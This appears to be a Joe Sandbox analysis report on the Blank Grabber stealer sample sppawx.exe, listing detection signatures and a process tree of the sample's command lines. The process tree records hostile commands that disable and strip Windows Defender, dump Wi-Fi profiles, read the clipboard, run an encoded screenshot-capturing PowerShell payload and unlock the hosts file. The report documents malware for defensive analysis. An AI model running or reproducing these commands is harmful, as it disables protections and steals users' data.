Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sppawx.exe

Overview

General Information

Sample name:sppawx.exe
Analysis ID:1574325
MD5:546606959cb5b178d679b203d938cf88
SHA1:f907e7d19734bf7459388b3299822858f0039711
SHA256:5184b92097feeecf09d4e92b58c252333d397b3b7c424b62e73ae2fc2f6be405
Tags:exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Potential dropper URLs found in powershell memory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • sppawx.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\sppawx.exe" MD5: 546606959CB5B178D679B203D938CF88)
    • sppawx.exe (PID: 7860 cmdline: "C:\Users\user\Desktop\sppawx.exe" MD5: 546606959CB5B178D679B203D938CF88)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8136 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8072 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7196 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 8124 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 8016 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8160 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7220 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4460 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2060 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7964 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 1320 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7196 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7340 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7328 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6680 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3860 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4068 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4476 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2724 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1556 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1320 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2960 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2624 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3060 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7836 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3592 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 332 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2620 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 3472 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7244 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4384 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7596 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 2884 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 5968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
